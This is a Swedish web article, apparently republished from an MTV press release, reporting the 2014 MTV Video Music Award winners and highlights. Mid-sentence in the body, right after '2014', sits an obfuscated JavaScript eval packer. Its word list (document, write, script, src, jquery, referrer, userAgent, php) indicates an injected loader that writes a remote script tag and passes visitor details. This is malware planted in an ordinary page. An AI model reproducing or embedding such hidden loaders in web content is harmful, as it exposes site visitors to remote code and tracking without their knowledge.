Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

Årets vinnare av MTV Video Music Award 2014

Årets vinnare av MTV Video Music Award 2014

2014 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|datht|var|u0026u|referrer|ssatk||js|php’.split(’|’),0,{}))
års MTV Video Music Award innehöll en fantastisk musikgala med oförglömgliga och explosiva uppträdande, oväntade händelser och starka känslomässiga budskap. Den stora vinnaren för kvällen var Beyoncé som kammade hem flest kategorier samt tog emot det prestigefyllda priset ”Michael Jackson Video Vanguard Award”. Miley Cyrus, Drake, Ed Sheeran, Kate Perry, Ariana Grande, Lorde, 5 Seconds of Summer tog alla emot ett pris var.

MTV Music Video Awards hölls igår, den 24 augusti i en sprillans ny arena, i området Inglewood, CA utanför Los Angeles. Den stjärnspäckade galan bjöd på storartade framträdanden och överraskande händelser. JAY Z och Blue Ivy presenterade ”Michael Jackson Video Vanguard Award” till Beyoncé som höll ett ödmjukt och tårfyllt tal där där hon bland annat tackade sin familj och sina fans. Hon kammade även hem  titlarna ”Best Collaboration”, ”Best Video With a Message” och “Best Cinematographic”.

Miley Cyrus vann kategorin ”Video of the Year” och chockade världen med ett känslofyllt budskap. Hon lät en före detta hemlös ung man, Jesse, göra entré på scenen för att ta emot priset för Miley Cyrus räkning och för alla de miljontals hemlösa i USA. Genom Jesse uppmanade Miley Cyrus hennes fans att vara med i kampen mot hemlösheten bland ungdomar.

Kvällen bjöd på flera storslagna och enstående framträdande, däribland av Hiphop drottningen Nicki Minaj, Taylor Swift, Sam Smith, Usher och Iggy Azalea.

Årets vinnare är:

VIDEO OF THE YEAR:
Miley Cyrus- ”Wrecking Ball”

BEST HIP HOP:
Drake ft. Majid Jordan – ”Hold On (We’re Going Home)”

BEST MALE:
Ed Sheeran – ”Sing”

BEST FEMALE:
Katy Perry ft. Juicy J – ”Dark Horse”

BEST POP:
Ariana Grande ft. Iggy Azalea – ”Problem”

BEST ROCK:
Lorde – ”Royals”

MTV ARTIST TO WATCH:
Fifth Harmony – ”Miss Movin On”

BEST COLLABORATION:
BEYONCÈ ft. JAY Z – ”Drunk In Love”

MTV CLUBLAND AWARD:
Zedd ft. Hayley Williams – ”Stay the Night”

BEST VIDEO WITH A SOCIAL MESSAGE
BEYONCÈ – ”Pretty Hurts”

BEST CINEMATOGRAPHY
BEYONCÈ – ”Pretty Hurts”

BEST EDITING
Eminem – ”Rap God”

BEST CHOREOGRAPHY
Sia – ”Chandelier”

BEST DIRECTION
DJ Snake & Lil Jon- ”Turn Down For What”

BEST ART DIRECTION
Arcade Fire – ”Reflektor”

BEST VISUAL EFFECTS OK Go – ”The Writing’s On the Wall”

BEST LYRIC VIDEO 5 Seconds of Summer – “Don’t Stop”

Detta är ett pressmeddelande från MTV